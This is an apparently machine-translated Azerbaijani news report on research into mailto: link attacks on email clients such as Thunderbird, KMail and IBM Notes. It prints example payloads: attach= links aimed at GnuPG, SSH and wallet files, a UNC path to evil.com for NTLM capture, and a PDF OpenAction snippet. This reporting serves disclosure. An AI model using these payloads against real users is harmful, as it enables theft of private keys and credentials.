“mailto:” bağlantılarından istifadə edərək e-poçt müştəri istifadəçilərinə hücum

Bochum Ruhr Universitetinin (Almaniya) tədqiqatçıları təhlil edilmişdir (PDF) qabaqcıl parametrlərlə “mailto:” bağlantılarını emal edərkən poçt müştərilərinin davranışı. Tədqiq olunan iyirmi e-poçt müştərisindən beşi “əlavə et” parametrindən istifadə edərək resursun dəyişdirilməsini manipulyasiya edən hücuma qarşı həssas idi. Əlavə altı e-poçt müştərisi PGP və S/MIME açarlarının dəyişdirilməsi hücumuna, üç müştəri isə şifrələnmiş mesajların məzmununu çıxarmaq üçün hücuma qarşı həssas idi.

Linklər «mailto:"linkdə göstərilən ünvana məktub yazmaq üçün e-poçt müştərisinin açılmasını avtomatlaşdırmaq üçün istifadə olunur. Ünvana əlavə olaraq, məktubun mövzusu və tipik məzmun üçün şablon kimi linkin bir hissəsi kimi əlavə parametrlər təyin edə bilərsiniz. Təklif olunan hücum, yaradılan mesaja qoşma əlavə etməyə imkan verən “qoşma” parametrini manipulyasiya edir.

Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) və Pegasus Mail poçt müştəriləri sizə avtomatik əlavə etməyə imkan verən əhəmiyyətsiz hücuma qarşı həssas idi. “mailto:?attach=path_to_file” kimi bir keçid vasitəsilə göstərilən istənilən yerli fayl. Fayl xəbərdarlıq göstərilmədən əlavə olunur, buna görə də xüsusi diqqət olmadan istifadəçi məktubun əlavə ilə göndəriləcəyini fərq etməyə bilər.

Məsələn, "mailto" kimi bir keçiddən istifadə edərək:[e-poçt qorunur]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" məktubun içinə GnuPG-dən şəxsi açarlar daxil edə bilərsiniz. Siz həmçinin kripto pul kisələrinin (~/.bitcoin/wallet.dat), SSH açarlarının (~/.ssh/id_rsa) məzmununu və istifadəçi üçün əlçatan olan istənilən faylları göndərə bilərsiniz. Üstəlik, Thunderbird “attach=/tmp/*.txt” kimi konstruksiyalardan istifadə edərək maska ​​ilə fayl qruplarını əlavə etməyə imkan verir.

Yerli fayllardan əlavə, bəzi e-poçt müştəriləri IMAP serverində şəbəkə yaddaşına və yollara keçidləri emal edir. Xüsusilə, IBM Notes sizə “attach=\\evil.com\dummyfile” kimi keçidləri emal edərkən faylı şəbəkə kataloqundan ötürməyə, həmçinin təcavüzkar tərəfindən idarə olunan SMB serverinə keçid göndərməklə NTLM autentifikasiya parametrlərini ələ keçirməyə imkan verir. (sorğu cari autentifikasiya parametrləri istifadəçisi ilə göndəriləcək).

Thunderbird sizə IMAP serverindəki qovluqlardan məzmun əlavə etməyə imkan verən “attach=imap:///fetch>UID>/INBOX>1/” kimi sorğuları uğurla emal edir. Eyni zamanda, IMAP-dan alınan, OpenPGP və S/MIME vasitəsilə şifrələnmiş mesajlar göndərilməzdən əvvəl poçt müştərisi tərəfindən avtomatik olaraq deşifrə edilir. Thunderbird-in tərtibatçıları idi xəbərdar edildi problemi haqqında fevralda və sayında Thunderbird 78 problem artıq həll olunub (Thunderbird 52, 60 və 68 filialları həssas olaraq qalır).

Thunderbird-in köhnə versiyaları tədqiqatçılar tərəfindən təklif edilən PGP və S/MIME-də iki digər hücum variantına qarşı da həssas idi. Xüsusilə, Thunderbird, eləcə də OutLook, PostBox, eM Client, MailMate və R2Mail2, poçt müştərisinin S/MIME mesajlarında ötürülən yeni sertifikatları avtomatik olaraq idxal etməsi və quraşdırması səbəbindən əsas dəyişdirmə hücumuna məruz qaldı. təcavüzkar istifadəçi tərəfindən artıq saxlanmış açıq açarların dəyişdirilməsini təşkil etmək.

Thunderbird, PostBox və MailMate-in həssas olduğu ikinci hücum, qaralama mesajlarının avtomatik saxlanması mexanizminin xüsusiyyətlərini manipulyasiya edir və mailto parametrlərindən istifadə edərək, şifrələnmiş mesajların şifrəsini açmağa və ya ixtiyari mesajlar üçün rəqəmsal imza əlavə etməyə imkan verir. nəticənin sonradan təcavüzkarın IMAP serverinə ötürülməsi. Bu hücumda şifrəli mətn “bədən” parametri vasitəsilə ötürülür və “meta yeniləmə” etiketi təcavüzkarın IMAP serverinə zəng etmək üçün istifadə olunur. Misal üçün: ' '

İstifadəçinin qarşılıqlı əlaqəsi olmadan “mailto:” bağlantılarını avtomatik emal etmək üçün xüsusi hazırlanmış PDF sənədlərindən istifadə edilə bilər - PDF-də OpenAction əməliyyatı sənədi açarkən mailto işləyicisini avtomatik işə salmağa imkan verir:

%PDF-1.5
1 0 obj
<< /Növ /Kataloq /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Növ /Fəaliyyət /S /URI/URI (mailto:?body=——PGP MESAJINA BAŞLAYIN——[…])>>
endobj

"mailto:" bağlantılarından istifadə edərək e-poçt müştəri istifadəçilərinə hücum

Mənbə: opennet.ru

Добавить комментарий